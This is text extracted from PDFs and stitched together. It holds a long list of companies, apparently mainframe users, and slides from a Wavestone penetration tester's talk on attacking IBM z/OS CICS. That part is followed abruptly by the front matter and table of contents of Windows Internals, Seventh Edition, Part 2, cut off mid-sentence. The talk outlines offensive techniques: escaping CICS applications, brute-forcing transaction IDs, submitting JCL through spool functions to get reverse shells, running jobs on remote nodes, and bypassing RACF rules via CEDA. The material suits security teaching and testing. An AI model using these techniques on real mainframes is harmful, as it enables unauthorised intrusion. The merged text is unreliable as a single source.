Constitution - Atlantic Pacific Tea Company (A&P) - Aurum/BSPR - Auto Zone - Aviva - Avnet - Avon (Westchester) - Axa (Jersey City) - ANZ Bank - BI Moyle Associates, Inc.
- Bajaj Allianz - Bank Central Asia (BCA) - Bank Indonesia (BI) - Bank International Indonesia (BII) - Bank Nasional Indonesia (BNI46) - Bank Of America - Bank of America
(BAC) - Bank of America (was Nations Bank – Can work out of Alpharetta office) - Bank of Montreal (BMO:CN) - Bank of New York Mellon (BNY) (BK) New York NY,
Pittsburgh, PA and Nashville, TN, Everett - Bank of Tokyo (Jersey City) - Bank Rakyat Indonesia (BRI) - Bank Vontobel - BB&T - Belastingdienst - Bi-Lo - Blue Cross Blue
Shield - Blue Cross Blue Shield GA - Blue Cross Blue Shield MD - Blue Cross Blue Shield SC - Blue Cross Blue Shield TN - Blue Cross/Blue Shield of Texas - Brindley
Technologies - BMC Software - BMW - BNP Paribas Fortis Brussels Belgium - BNP Paribas Paris France - Boston Univerity - Broadridge Financial Services - Brotherhood Bank
& Trust - Broward County Schools - Brown Brothers Harriman (BBH) - British Airways - C&S Wholesale Grocers - CA Technologies - California Casualty Management
Company, San Mateo and Sacramento, CA - Canadian Imperial Bank of Commerce (CIBC) - CAP GEMINI - Capco - Capital One - Glen Allen/West Creek - Catapiller - Cathy
Pacific - CDSI - Ceridian - CGI - Charles Schwab - Chase - Chemical Abstract Services (CAS) - Choice Point - Chrysler - Chubb - Ciber - CIC - CIGNA - Citi - Citi / Primerica -
Citigroup - City and County of Alameda, California - City of Atlanta - City of New York (Several locations) - City of Phoenix Phoenix Az USA David DeBevec - Co-operators
Canada - Coca Cola Enterprises - Coca-Cola Co - Coding Basics, Inc. - Cognizant Technology Solutions - Collective Brands - Collabera - Commonwealth Automobile
Reinsurers - Comerica Bank - Commerce Bank Kansas City MO USA - Commerzbank - Community Loans of America - Computer Outsourcing - Computer Sciences
Corporation (CSC) - Con Edison (Manhattan) - Connecticut, State of (various Departments including Transportation, Public Safety, and Information Technologies) -
Connecture - Conseco - Cotton States Mutual Ins Company - COVANYS - CPS - CPU Service - Crawford and Company - Credit Suisse - CSC - CSI International OH USA Jon
Henderson, COO - CSX - CTS - Customs & Border Enforcement (CBE) - CVS pharmacy - DATEV eG - Dekalb County - Delphi - Delta Air Lines Inc - Depository Trust and
Clearing Corp - Deutsche Bank - Deutsche Bundesbank - DHL IT Services - Delloits - DEVK Köln - DIGITAL - Dominion Power/Dominion Resources - Glen Allen/Innsbrook -
Donovan Data Systems (Manhattan) - DST - DST Output - DTC (Manhattan) - Duke Energy - Duke Power, DB2 apps - Eaton Cleveland Ohio USA Cooper MA - Ecolab, Inc -
EDB ErgoGroup - Eddie Bauer - EDEKA - EDS - Edward Jones St. Louis MO Tempe AZ USA - ELCOT - ELIT - Emblem Health - EMC - Emigrant Savings Bank - Emirates Airline
- Emory Univ - Enbridge Gas Distribution - Energy Future Holdings Dallas Tx USA - Equifax Inc - Experian Americas - Express Scripts - Extensity - Family Life Ins. Co. -
FannieMae - Farm Bureau Financial Services - Federal Reserve - FedEx - FHNC/First Tennessee Bank - Fidelity Investments Boston MA & New York - Fiducia - FINA - Finanz
Informatik - First Data - FIS - Fiserv (formerly Check Free) - Fiserv IntegraSys - Florida Blue - Florida Power & Light - Florida Power & Light (FPL) Juno Beach FL USA Utility -
Ford - Ford Motor Co - Fortis - FPL - Franklin Templeton - FreddieMac - Friedkin Information Technology Houston TX USA - Fujitsu America Dallas TX KLCameron
Outsourcing - Fulton County - Garanti Technology Istanbul Turkey - GAVI - Garuda Indonesia Jakarta Indonesia Gun gun - GCCPC - GE Financial Assurance - GEICO Atlanta
GA Insurance - General Dynamics - General Motors Detroit Austin Atlanta Phoenix - Genuine Auto Parts ( Motion Industries) - Georgia Farm Bureau Mutual - Georgia Pacific -
Georgia State Dept of Education - GEORGIA STATE UNIVERSITY - GKVI - Global SMS Networks Pvt. Ltd. ( GLOBALSMSC ) - GM - GMAC SmartCash - Grady Hospital - Great-
West Life - Governor's Office - Great Lakes Higher Education Corp. - Group Health Cooperative - Guardian Life - Gwinnett County - Gwinnett County School District -
Gwinnett Medical Center - H. E. Butt Grocery Co. - H&W Computer Systems, Inc. - Harland Clarke (John H. Harland Co) - Hartford Life - HCL - HDFC Bank - HealthPlan
Services - Heartland Payment Systems (Texas) - Helsana - Hewlett Packard - Hewlett-Packard - Hexaware - Highmark - HMC Holdings (Manhattan) - HMS - Home Depot
U.S.A., Inc. - HPS4 - HSBC Trinkaus & Burkhardt AG - HSBC - IBM - IBM Global Services - IBM India - IBM Silicon Valley Laboratory, San Jose, CA (home of DFSMS, DB2,
IMS, languages) - IBM Tucson, Arizona Software Development Laboratory (DFSMShsm, Copy Services) - Iflex - Igate Hyderabad India Sivaprasad Vura - Information
Builders - Infosys - Infotel - ING - ING NA Insurance Corp - Innova Solutions Inc. - Insurance Services Office - Intercontinental Hotels Group - IPACS - IRS - IRS, New
Carrolton MD - ISO (Jersey City) - ITERGO - IVV - Jackson National - Jefferies Bank - John Dere - JPMorgan Chase - Kaiser Permanente Corona CA USA - Kansas City Life -
Kawasaki Motors Corp - KEANE - KEONICS - Key Bank - Klein Mgt. Systems (Westchester) - Kohls Department Stores - Krakatau Steel Cilegon Indonesia - KPN - Krasdale
Foods, Inc. - L&T - LabCorp - Lawrence Livermore National Laboratories, Livermore, CA - LBBW (Landesbank Baden Wuerttemberg) - LDS - Lender Processing Services
(LPS) - Leumi Bank Leumi Bank Tel-Aviv ISrael, Shai Perry - Lexis Nexis (formerly ChoicePoint Inc) - Liberty Life - Liberty Mutual (Safeco Insurance) - Lincoln National -
Lloyds Banking Group - Lockheed - logica CMG - Logica Inc - Lousiana Housing Fin Ag / Baton Rouge CC - Lowe's - Lufthansa Systems - M&T Bank - Macro Soft - Macy's
Systems and Technologies - Maersk Data (Global Logistics/Shipment Tracking)
© WAVESTONE
5
Maersk Lines (Global Container Shipping), - Mahindra Satyam - Mainframe Co Ltd - Mainline Information Systems - Maintec Technologies Inc. - MAJORIS - Manhattan
Associates - Manulife - Marist College - Marriott Hotel - MARTA - MASCON - Mass Mutual - MASTEK - Master Card INC - May bank - MBT - Media Ocean (office here, HQ
most likely New York) - Medical College of Georgia - Medical Mutual of Ohio Cleveland OH USA CooperMA - Medicare - Medstar Health - Meredith Corp - Merlin International
- Veteran Affairs - Merrill Lynch (now BOA) - MetaVante (Now Fidelity) - Metlife - Metro North (Manhattan) - MFX Fairfax Morristown NJ USA KLCameron Outsourcing - MHS
- Miami Dade County - MINDTEK - MINDTREE - Ministry of Interior (NIC) - Missouri Gas Energy Kansas City MO USA KLCameron Utility - Modern Woodmen of America -
Montefiore Hospital (Bronx) - Morgan Stanley (Brooklyn) - Motor Vehicles Admin - Mphasis - Mpowerss - Mt. Sinai (Bronx) - Mutual of America - NASDAQ Stock Market -
Nation Wide Insurance - National Life Group - National Life Ins. Co. - NAV - Navistar - NBNZ - Nest - New York Times (Manhattan) - New York University - Nike INC - Norfolk
Southern Corp - Norfork Southern Railway - North Carolina State Employees' Credit Union -NYS Dept of Tax and Fin - OCIT , Sacramento Cty - OFD - Office Depot Deerfield
& DelRay - Outsourcing deTecnica deSistemas - Hardware - Old Mutual - Ohio Public Employees Retirement System - ONCOR Dallas TX USA - Paccar - Palm Beach County
School DistrictThe School District of Palm Beach County West Palm Beach FL USA George Rodriguez - Parker Hannifin Cleveland Ohio USA Cooperma - Partsearch
Technologies - Patni - Penn Mutual - Pepsico INC - Pershing LLC - Philip Morris - Phoenix Companies - Phoenix Home Life - Physicians Mutual Insurance Company (PMIC)
Omaha NE USA KLCameron Insurance - Pioneer Life Insurance - Pitney Bowes (Danbury, Ct.) - PKO BP Warszawa, Poland - PNC Bank Pittsburgh PA USA - POLARIS - Polfa
Tarchomin - Praxair (Danbury, Ct.) - Primerica Life Ins Co - Princeton Retirement Group Inc - Principal Financial Group - Progressive Insurance - Prokarma Hyderabad India
Sivaprasad Vura - Protech Training - Prudential - PSA Peugeot Citroen - PSP - PSC Electrical Contracting - Publix - Puget Sound Energy (Seattle) - PCCW - PWC - QBE the
Americas - R R Donlley - R+V - RBS (Royal Bank of Scotland) - RBSLynk - RHB bank - Rite Aid - Riyad Bank - Rocket Software - Roundy's Supermarkets Milwaukee WI USA -
Royal Bank of Canada (RBC) - Rubbermaid - Russell Stovers - Rutgers University - Office of IT - Ryder Trucks Miami FL USA - S1 - SAS - SAS Institute NC USA -
SATHYAM/PCS - SCHLUMBERGER Sema - Schneider National Green Bay WI USA KLCameron Transportation - Scientific Games International, Inc - Scope
International(Standard Chatered) - Scotiabank - Scott Trade - SE Tools - Seminole Electric - Sentry Insurance - Sears Holdings Corporation - Self Employed Consultant -
Shands HealthCare - SIAC (Brooklyn) - Siemens - SLK software - Sloan Kettering (Bronx) - Social Security - Software Paradigms India - Southern California Edison - Southern
Company - Standard Insurance - State Auto Insurance - State Farm Ins - State of Alabama Child Support Enforcement Services - State of Alaska - State of California Teale
Data Center, Rancho Cordova, CA - State of Connecticut (various Departments including Public Safety, Transportation, Information Technologies) - State of Florida -
Northwest Regional Data Center - State of GA - DHS - State of GA - DOL - State of GA - GTA - State of Georgia - State of Illinois - Central Management Services (CMS) -
Springfield, IL - State of Montana - Statens Uddannelsesstøtte - Steria - SunGard - SunGard Computer Services Voorhees NJ - Suntrust Banks Inc - Symetra - SYNTEL - TAG
- Taiwan Cooperative Bank Taiwan - Tampa General - Target INC - Target India - Tata Steel - TCS - TD Ameritrade - TD Auto Finance - TD Canada Trust - TechData - TECO
- TESCO Bangalore India Sivaprasad Vura - Texas A&M University Colleg Station TX USA - Thomson Financial-Transaction Services - Thomson Reuters - Thrivent - TIAA-
CREF - Time Customer Service - TIMKEN - Total Systems - Traveler's Insurance - Travelport - Treehouse Software, Inc. - Trinity Health - TUI - Turner Broadcasting TBS - T.
Rowe Price - T-Systems - UBS - UBS APAC (Union Bank of Switzerland) - Union Bank - Union Pacific Omaha NE USA KLCameron Transportation - United Health Care (UHG) -
United Health Group (UHG) - United Missouri Bank - United Parcel Service Inc (UPS) - United Parcel Service Inc - United States Postal Service - United States Postal Service -
DB2 DBA Ops - United States Postal Service — Mainframe Ops - United States Postal Service — Mgmt Ops - United States Postal Service Applic. Dev. - United States Steel -
United Technologies - Universität Leipzig - University of California at Berkeley, CA - University of Chicago Chicago IL USA - University of NC - University System of Georgia -
UNUM Disability/Insurance Portland ME Columbia SC - UPS (Paramus, NJ) - US Bank - US Software - USAA - Utica Insurance Utica NY USA Insurance - Vanguard Group -
Verizon (Wireless) - Vertex (only Seattle area) - VETTRI - VF Corp. - Virginia Department of Motor Vehicles - Virginia Dept of Corrections - Virginia State Corp, Commission -
VISA Inc. - VOLVO IT Corp. - VW - Wachovia (merging into Wells Fargo) - Waddell & Reed FInancial Services - Wakefern Food Corp - Walmart - Washington State
Department of Social and Health Services - Washington State Department of Transportation - Washington State Employment Security Department - Watkins(now part of
Fedex) - Wellogic - Wellmark - Wellpoint - Wells Fargo Bank various USA locations including NY, NJ, NC - WGV - Winn-Dixie - WIPRO - WIPRO Technologies - WIPRO (ex-
InfoCrossing) USA Outsourcing - XANSA - Xerox - YRCW - Zions Bancorporation - Banco Davivienda - Blue Cross Blue Shield AL - State of Alabama - ZETO - Avon Brasil -
Bacen www.bcb.gov.br - Banco do Brasil - Banco Bradesco - Banco Itau - Bic Banco - Bovespa - Casas Bahia - CEF - CEPROMAT - Cielo - Copel - Consist - CPQD - DPF - Fiat
- IGS - HSBC GLT - Matera - Montreal - Porto Seguro - Prodam SP - ProdeSP - RedeCard - Riocard TI - Sanepar - Santander - Serasa Experian - SERPRO - Tivit - T-System -
Voith - Zagrebacka Banka (ZABA) - NMBS-Holding - City of Tulsa - State of AZ - ADOT - Business Connexion (www.bcx.co.za) - Strate (www.Strate.co.za) - First National
Bank - Reserve Bank of India (www.rbi.org.in) - Allied Irish Bank AIB (www.aib.ie) - Sainsburys Plc - GAP Inc - Barclays bank - ABSA Bank
© WAVESTONE
6
https://mainframesproject.tumblr.com
© WAVESTONE
https://mainframesproject.tumblr.com 7
© WAVESTONE
8
About me
Pentester at Wavestone, mainly hacking Windows and Unix stuff
First got my hands on a mainframe in 2014…Hooked ever since
When not hacking stuff: Metal and wine
•
zospentest.tumblr.com
•
github.com/ayoul3
•
Ayoul3__
© WAVESTONE
9
This talk
Demystifying mainframes
Basics of z/OS
Customer Information Control System (CICS)
Hacking CICS
@ayoul3__
© WAVESTONE
10
Quick intro to mainframe Z
Main OS on IBM Z Series is called z/OS (v1.14 and v2.2)
Need a 3270 emulator (x3270, wc3270) to interact remotely
with a Mainframe
TN3270 is heavily based on telnet and is supported by Wireshark
@ayoul3__
© WAVESTONE
11
What we need to know about z/OS
VTAM: Virtual Telecommunication Access Method
TSO: Time Sharing option
JES: JOB Entry System
OMVS: Open MVS
RACF: Resource Access Control Facility
@ayoul3__
© WAVESTONE
12
VTAM is the software driver that handles TCPIP sessions (and SNA)
Most likely the first thing you see when connecting to the
mainframe
Runs on port 23, 992, 5023, etc.
Gives access to most applications hosted on the Mainframe
Each application has a max-8 character identifier
TIP: if you want to know if you’ re on VTAM type: IBM ECHO. It should return
123456789ABCDEFGH…
VTAM
Virtual Telecommunication Access Method
© WAVESTONE
13
© WAVESTONE
14
TSO is the the equivalent of a shell on z/OS
Used to execute commands, browse files, etc.
TSO
Time sharing option
@ayoul3__
© WAVESTONE
15
© WAVESTONE
16
Every program on z/OS is run as a JOB
JCL is the ‘scripting’ language used to write a JOB on
Mainframe
JOBs are queued in JES which decides which one to run
depending on the JOB’s priority
JES
JOB Entry System
@ayoul3__
© WAVESTONE
17
JOB CARD
PROGRAM
INPUTS
© WAVESTONE
18
Unix System Services
USS
@ayoul3__
© WAVESTONE
19
USS stands for Unix System services
Every z/OS has a UNIX running on it (since 2001)
It implements TCP/IP stack, handles HTTP, FTP, JAVA…
Can be accessed directly via open telnet port (1023) or
with OMVS command from TSO
USS
@ayoul3__
© WAVESTONE
20
© WAVESTONE
21
RACF
Resource Access Control Facility
RACF is the core security system on z/OS
It is the database that holds all secrets (passwords, certificates,
cipher keys, etc.)
Controls every resource access, privilege escalation, execution,
authentication
RACF is a product of IBM. Other security systems like TopSecret or
ACF2 may be used instead of RACF
@ayoul3__
© WAVESTONE
22
Ok then, pentest this…
© WAVESTONE
23
And then there was CICS…
Customer Information Control System
CICS is a combination Wordpress and Apache…before it
was cool (around 1968)
Current version is CICS TS 5.3
@ayoul3__
© WAVESTONE
24
API in COBOL/C/Java
Handles cache, concurrence access,
etc.
Uniform rendering of the screen
Easily thousands of request/sec
© WAVESTONE
25
Order the following by requests/second
Google search
Facebook like
Youtube views
Twitter tweet
CICS
@ayoul3__
© WAVESTONE
26
0.00
200,000.00
400,000.00
600,000.00
800,000.00
1,000,000.00
1,200,000.00
1,400,000.00
Youtube views
Facebook
posts
Google search Twitter tweets
CICS
Requests per second around the world
@ayoul3__
© WAVESTONE
27
© WAVESTONE
28
© WAVESTONE
29
© WAVESTONE
30
CICS flow
VTAM
CUST1
CICS region (CUST1)
GMTRAN
= CESN
INQ1
RACF
TRAN ID
PROGRAM
CESN
DFHSNP
INQ1
CUSTINQ1
PCT
PROGRAM
LOCATION
DFHCOMP2
DFH320.SDFHLOAD
(DFHSNP)
CUSTINQ1
DFH320.SDFHLOAD
(CUSTINQ1)
PPT
User &
Password
OK
@ayoul3__
© WAVESTONE
31
CICS flow
VTAM
CUST1
CUST1
GMTRAN
= CESN
INQ1
FCT
FILE
LOCATION
LOAD
CUSTMAS
AYOUB.KICKS.MURACH.CUSTMAS
0
EXEC CICS
READ FILE(CUSTMAS)
END-EXEC
DISK
@ayoul3__
© WAVESTONE
32
Now that we are CICS experts
Let’s break this ****
@ayoul3__
© WAVESTONE
33
Jail break
Find the right combination of keys to interrupt the normal flow
of an App and get back to the CICS terminal
It is the equivalent of finding the admin panel on a
URL…except way easier
It can be to press PF3 on the logon panel, or RESET button,
or PF12 on some menu, etc.
@ayoul3__
© WAVESTONE
34
1. Escaping from the CICS app
© WAVESTONE
35
1. Escaping from the CICS app
© WAVESTONE
36
We can enter any transaction ID..now what ?
The ID is 4 digits….we can easily bruteforce it :
• Mainframe_brute:
https://github.com/sensepost/mainframe_brute
• Nmap scripts:
https://github.com/zedsec390/NMAP/blob/master/cics-
enum.nse
• CICSShot: https://github.com/ayoul3/cicsshot
@ayoul3__
© WAVESTONE
37
CESN (Login transaction)
CEMT (Master terminal console)
CECI (Live interpreter debugger)
CEDA (Online Resource Definition program)
CEDB (Offline Resource Definition program)
Default transactions
@ayoul3__
© WAVESTONE
38
CEMT
© WAVESTONE
39
CEMT INQUIRE
© WAVESTONE
40
© WAVESTONE
41
© WAVESTONE
42
© WAVESTONE
43
© WAVESTONE
44
HLQ
REST
File Options
© WAVESTONE
45
© WAVESTONE
46
© WAVESTONE
47
CEMT
Get some useful information about the system:
• List temporary storage queues
• List DB2 connections
• List webservices
• Scrap userids in menus
Uninstall programs, files, webservices, db2connections,etc.
@ayoul3__
© WAVESTONE
48
CECI
It executes CICS API commands…that’s it really :-)
© WAVESTONE
49
Remember the CICS APIs
© WAVESTONE
50
CECI
© WAVESTONE
51
CECI
© WAVESTONE
52
CECI
© WAVESTONE
53
CECI
© WAVESTONE
54
CECI
© WAVESTONE
55
© WAVESTONE
56
This is all nice but can we 0wn the mainframe ?
@ayoul3__
© WAVESTONE
57
CICS has a nice feature called Spool functions
A spool is basically a normal dataset (or file) containing the
output of a JOB (program)
Using Spool functions we can generate a dataset and send it
directly to JES (Job scheduler)…which will execute it !
CECI
@ayoul3__
© WAVESTONE
58
The theory
@ayoul3__
© WAVESTONE
59
The theory
@ayoul3__
© WAVESTONE
60
The theory
@ayoul3__
© WAVESTONE
61
© WAVESTONE
62
© WAVESTONE
63
© WAVESTONE
64
© WAVESTONE
65
Hurray !
@ayoul3__
© WAVESTONE
66
Let’s automate this to do some 3l33t3 stuff
@ayoul3__
© WAVESTONE
67
A nice reverse shell
Allocation of a dataset
Reverse shell in REXX
Execution of the dataset
© WAVESTONE
68
© WAVESTONE
69
Kicker #1
Shell payloads included in CICSPwn:
• reverse_tso/direct_tso: shell in the TSO environment
• reverse_unix/direct_unix: shell in the UNIX environment
• ftp: connects to an FTP server and pushes/gets files
• reverse_rexx/direct_rexx: execute rexx script directly in
memory
• Custom JCL: executes your own JCL
@ayoul3__
© WAVESTONE
70
The JOB is executed with the userid launching CICS
(START2) regardless of the user submitting it
Kicker #2
© WAVESTONE
71
Kicker #2
© WAVESTONE
72
What if it were NODE(WASHDC)
or NODE(REMOTESYS)
…
Yes execution on another mainframe :-)
Kicker #3
© WAVESTONE
73
A few problems though…
• Spool option turned off (Spool=NO)
• CECI not available
@ayoul3__
© WAVESTONE
74
© WAVESTONE
75
Use Transient Data Queues instead
TDQ are handles towards files not defined in CICS
Some files are more special than others
Spool=NO
@ayoul3__
© WAVESTONE
76
TDQueues
© WAVESTONE
77
TDQueues
© WAVESTONE
78
• Spool option turned off
(Spool=NO)
• CECI not available
One down
@ayoul3__
© WAVESTONE
79
CECI not available
© WAVESTONE
80
To forbid CECI for instance RACF admins define the following
rule:
RDEFINE TCICSTRN CECI UACC(NONE)
CECI RACF rule
@ayoul3__
© WAVESTONE
81
CEDA is an IBM utility to manage resources on CICS
• map files to their real locations
• set temporary storage files
• define/alter resources
CEDA to the rescue
It is way less protected than CECI
The idea is to copy CECI to a new transaction name always made
available by RACF :
Logon transaction
Printing transaction
Paging transaction…
@ayoul3__
© WAVESTONE
82
CEDA to the rescue
© WAVESTONE
83
If you have access to CEDA you can bypass
any RACF rule
Use --bypass on CICSPwn ;)
CEDA to the rescue
@ayoul3__
© WAVESTONE
84
vv
CEDA to the rescue
© WAVESTONE
85
CEDA to the rescue
© WAVESTONE
86
• zospentest.tumblr.com
• github.com/ayoul3
• Ayoul3__ | pdf |
Windows Internals
Seventh Edition
Part 2
Andrea Allievi
Alex Ionescu
Mark E. Russinovich
David A. Solomon
© Windows Internals, Seventh Edition, Part 2
Published with the authorization of Microsoft Corporation by:
Pearson Education, Inc.
Copyright © 2022 by Pearson Education, Inc.
All rights reserved. This publication is protected by copyright, and permission must be obtained from
the publisher prior to any prohibited reproduction, storage in a retrieval system, or transmission in any
form or by any means, electronic, mechanical, photocopying, recording, or likewise. For information
regarding permissions, request forms, and the appropriate contacts within the Pearson Education Global
Rights & Permissions Department, please visit www.pearson.com/permissions.
No patent liability is assumed with respect to the use of the information contained herein. Although
every precaution has been taken in the preparation of this book, the publisher and author assume no
responsibility for errors or omissions. Nor is any liability assumed for damages resulting from the use
of the information contained herein.
ISBN-13: 978-0-13-546240-9
ISBN-10: 0-13-546240-1
Library of Congress Control Number: 2021939878
ScoutAutomatedPrintCode
TRADEMARKS
Microsoft and the trademarks listed at http://www.microsoft.com on the “Trademarks” webpage are
trademarks of the Microsoft group of companies. All other marks are property of their respective
owners.
WARNING AND DISCLAIMER
Every effort has been made to make this book as complete and as accurate as possible, but no warranty
or fitness is implied. The information provided is on an “as is” basis. The author, the publisher, and
Microsoft Corporation shall have neither liability nor responsibility to any person or entity with respect
to any loss or damages arising from the information contained in this book or from the use of the
programs accompanying it.
SPECIAL SALES
For information about buying this title in bulk quantities, or for special sales opportunities (which may
include electronic versions; custom cover designs; and content particular to your business, training
goals, marketing focus, or branding interests), please contact our corporate sales department at
[email protected] or (800) 382-3419.
For government sales inquiries, please contact [email protected].
For questions about sales outside the U.S., please contact [email protected].
Editor-in-Chief: Brett Bartow
Development Editor: Mark Renfrow
Managing Editor: Sandra Schroeder
Senior Project Editor: Tracey Croom
Executive Editor: Loretta Yates
Production Editor: Dan Foster
Copy Editor: Charlotte Kughen
Indexer: Valerie Haynes Perry
Proofreader: Dan Foster
Technical Editor: Christophe Nasarre
Editorial Assistant: Cindy Teeters
Cover Designer: Twist Creative, Seattle
Compositor: Danielle Foster
Graphics: Vived Graphics
To my parents, Gabriella and Danilo, and to my
brother, Luca, who all always believed in me and
pushed me in following my dreams.
—ANDREA ALLIEVI
To my wife and daughter, who never give up on me
and are a constant source of love and warmth. To my
parents, for inspiring me to chase my dreams and
making the sacrifices that gave me opportunities.
—ALEX IONESCU
Contents at a Glance
About the Authors
Foreword
Introduction
CHAPTER 8 System mechanisms
CHAPTER 9 Virtualization technologies
CHAPTER 10 Management, diagnostics, and tracing
CHAPTER 11 Caching and file systems
CHAPTER 12 Startup and shutdown
Contents of Windows Internals, Seventh Edition, Part 1
Index
Contents
About the Authors
Foreword
Introduction
Chapter 8 System mechanisms
Processor execution model
Segmentation
Task state segments
Hardware side-channel vulnerabilities
Out-of-order execution
The CPU branch predictor
The CPU cache(s)
Side-channel attacks
Side-channel mitigations in Windows
KVA Shadow
Hardware indirect branch controls (IBRS, IBPB, STIBP,
SSBD)
Retpoline and import optimization
STIBP pairing
Trap dispatching
Interrupt dispatching
Line-based versus message signaled–based interrupts
Timer processing
System worker threads
Exception dispatching
System service handling
WoW64 (Windows-on-Windows)
The WoW64 core
File system redirection
Registry redirection
X86 simulation on AMD64 platforms
ARM
Memory models
ARM32 simulation on ARM64 platforms
X86 simulation on ARM64 platforms
Object Manager
Executive objects
Object structure
Synchronization
High-IRQL synchronization
Low-IRQL synchronization
Advanced local procedure call
Connection model
Message model
Asynchronous operation
Views, regions, and sections
Attributes
Blobs, handles, and resources
Handle passing
Security
Performance
Power management
ALPC direct event attribute
Debugging and tracing
Windows Notification Facility
WNF features
WNF users
WNF state names and storage
WNF event aggregation
User-mode debugging
Kernel support
Native support
Windows subsystem support
Packaged applications
UWP applications
Centennial applications
The Host Activity Manager
The State Repository
The Dependency Mini Repository
Background tasks and the Broker Infrastructure
Packaged applications setup and startup
Package activation
Package registration
Conclusion
Chapter 9 Virtualization technologies
The Windows hypervisor
Partitions, processes, and threads
The hypervisor startup
The hypervisor memory manager
Hyper-V schedulers
Hypercalls and the hypervisor TLFS
Intercepts
The synthetic interrupt controller (SynIC)
The Windows hypervisor platform API and EXO partitions
Nested virtualization
The Windows hypervisor on ARM64
The virtualization stack
Virtual machine manager service and worker processes
The VID driver and the virtualization stack memory
manager
The birth of a Virtual Machine (VM)
VMBus
Virtual hardware support
VA-backed virtual machines
Virtualization-based security (VBS)
Virtual trust levels (VTLs) and Virtual Secure Mode
(VSM)
Services provided by the VSM and requirements
The Secure Kernel
Virtual interrupts
Secure intercepts
VSM system calls
Secure threads and scheduling
The Hypervisor Enforced Code Integrity
UEFI runtime virtualization
VSM startup
The Secure Kernel memory manager
Hot patching
Isolated User Mode
Trustlets creation
Secure devices
VBS-based enclaves
System Guard runtime attestation
Conclusion
Chapter 10 Management, diagnostics, and tracing
The registry
Viewing and changing the registry
Registry usage
Registry data types
Registry logical structure
Application hives
Transactional Registry (TxR)
Monitoring registry activity
Process Monitor internals
Registry internals
Hive reorganization
The registry namespace and operation
Stable storage
Registry filtering
Registry virtualization
Registry optimizations
Windows services
Service applications
Service accounts
The Service Control Manager (SCM)
Service control programs
Autostart services startup
Delayed autostart services
Triggered-start services
Startup errors
Accepting the boot and last known good
Service failures
Service shutdown
Shared service processes
Service tags
User services
Packaged services
Protected services
Task scheduling and UBPM
The Task Scheduler
Unified Background Process Manager (UBPM)
Task Scheduler COM interfaces
Windows Management Instrumentation
WMI architecture
WMI providers
The Common Information Model and the Managed Object
Format Language
Class association
WMI implementation
WMI security
Event Tracing for Windows (ETW)
ETW initialization
ETW sessions
ETW providers
Providing events
ETW Logger thread
Consuming events
System loggers
ETW security
Dynamic tracing (DTrace)
Internal architecture
DTrace type library
Windows Error Reporting (WER)
User applications crashes
Kernel-mode (system) crashes
Process hang detection
Global flags
Kernel shims
Shim engine initialization
The shim database
Driver shims
Device shims
Conclusion
Chapter 11 Caching and file systems
Terminology
Key features of the cache manager
Single, centralized system cache
The memory manager
Cache coherency
Virtual block caching
Stream-based caching
Recoverable file system support
NTFS MFT working set enhancements
Memory partitions support
Cache virtual memory management
Cache size
Cache virtual size
Cache working set size
Cache physical size
Cache data structures
Systemwide cache data structures
Per-file cache data structures
File system interfaces
Copying to and from the cache
Caching with the mapping and pinning interfaces
Caching with the direct memory access interfaces
Fast I/O
Read-ahead and write-behind
Intelligent read-ahead
Read-ahead enhancements
Write-back caching and lazy writing
Disabling lazy writing for a file
Forcing the cache to write through to disk
Flushing mapped files
Write throttling
System threads
Aggressive write behind and low-priority lazy writes
Dynamic memory
Cache manager disk I/O accounting
File systems
Windows file system formats
CDFS
UDF
FAT12, FAT16, and FAT32
exFAT
NTFS
ReFS
File system driver architecture
Local FSDs
Remote FSDs
File system operations
Explicit file I/O
Memory manager’s modified and mapped page writer
Cache manager’s lazy writer
Cache manager’s read-ahead thread
Memory manager’s page fault handler
File system filter drivers and minifilters
Filtering named pipes and mailslots
Controlling reparse point behavior
Process Monitor
The NT File System (NTFS)
High-end file system requirements
Recoverability
Security
Data redundancy and fault tolerance
Advanced features of NTFS
Multiple data streams
Unicode-based names
General indexing facility
Dynamic bad-cluster remapping
Hard links
Symbolic (soft) links and junctions
Compression and sparse files
Change logging
Per-user volume quotas
Link tracking
Encryption
POSIX-style delete semantics
Defragmentation
Dynamic partitioning
NTFS support for tiered volumes
NTFS file system driver
NTFS on-disk structure
Volumes
Clusters
Master file table
File record numbers
File records
File names
Tunneling
Resident and nonresident attributes
Data compression and sparse files
Compressing sparse data
Compressing nonsparse data
Sparse files
The change journal file
Indexing
Object IDs
Quota tracking
Consolidated security
Reparse points
Storage reserves and NTFS reservations
Transaction support
Isolation
Transactional APIs
On-disk implementation
Logging implementation
NTFS recovery support
Design
Metadata logging
Log file service
Log record types
Recovery
Analysis pass
Redo pass
Undo pass
NTFS bad-cluster recovery
Self-healing
Online check-disk and fast repair
Encrypted file system
Encrypting a file for the first time
The decryption process
Backing up encrypted files
Copying encrypted files
BitLocker encryption offload
Online encryption support
Direct Access (DAX) disks
DAX driver model
DAX volumes
Cached and noncached I/O in DAX volumes
Mapping of executable images
Block volumes
File system filter drivers and DAX
Flushing DAX mode I/Os
Large and huge pages support
Virtual PM disks and storages spaces support
Resilient File System (ReFS)
Minstore architecture
B+ tree physical layout
Allocators
Page table
Minstore I/O
ReFS architecture
ReFS on-disk structure
Object IDs
Security and change journal
ReFS advanced features
File’s block cloning (snapshot support) and sparse VDL
ReFS write-through
ReFS recovery support
Leak detection
Shingled magnetic recording (SMR) volumes
ReFS support for tiered volumes and SMR
Container compaction
Compression and ghosting
Storage Spaces
Spaces internal architecture
Services provided by Spaces
Conclusion
Chapter 12 Startup and shutdown
Boot process
The UEFI boot
The BIOS boot process
Secure Boot
The Windows Boot Manager
The Boot menu
Launching a boot application
Measured Boot
Trusted execution
The Windows OS Loader
Booting from iSCSI
The hypervisor loader
VSM startup policy
The Secure Launch
Initializing the kernel and executive subsystems
Kernel initialization phase 1
Smss, Csrss, and Wininit
ReadyBoot
Images that start automatically
Shutdown
Hibernation and Fast Startup
Windows Recovery Environment (WinRE)
Safe mode
Driver loading in safe mode
Safe-mode-aware user programs
Boot status file
Conclusion
Contents of Windows Internals, Seventh Edition, Part 1
Index
About the Authors
ANDREA ALLIEVI is a system-level developer and security research engineer
with more than 15 years of experience. He graduated from the University of
Milano-Bicocca in 2010 with a bachelor’s degree in computer science. For
his thesis, he developed a Master Boot Record (MBR) Bootkit entirely in 64-
bits, capable of defeating all the Windows 7 kernel-protections (PatchGuard
and Driver Signing enforcement). Andrea is also a reverse engineer who
specializes in operating systems internals, from kernel-level code all the way
to user-mode code. He is the original designer of the first UEFI Bootkit
(developed for research purposes and published in 2012), multiple
PatchGuard bypasses, and many other research papers and articles. He is the
author of multiple system tools and software used for removing malware and
